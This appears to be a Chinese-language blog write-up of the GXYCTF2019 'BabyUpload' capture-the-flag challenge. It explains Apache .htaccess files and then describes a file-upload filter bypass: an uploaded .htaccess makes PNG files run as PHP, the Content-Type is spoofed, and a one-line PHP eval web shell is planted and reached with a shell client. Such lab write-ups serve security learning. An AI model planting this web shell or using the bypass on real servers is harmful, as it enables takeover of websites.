[GXYCTF2019]BabyUpload

笔记:

.htaccess是什么

.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。

笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

这里上传.htaccess文件是为了让它把png图片当php执行。

 

1.上传一个包含后门的shell.php文件,提示后缀不能包含ph,那.phtml文件也是不行的

2.考虑上传一个.htaccess文件,并把.php后缀修改为.png,让.htaccess文件把png文件当php执行。

3.上传失败,就抓包

[GXYCTF2019]BabyUpload

4.抓包后把Content-Type修改为image/jpeg,上传成功

[GXYCTF2019]BabyUpload

5.再上传一个shell.png,内容为

<script language="php">eval($_POST['hhz'])</script>

同样修改Content-Type: image/jpeg,上传成功,然后用蚁剑连接,得到flag。

[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

 

 

上一篇:MRCTF2020 你传你


下一篇:upload-labs-master(1~6)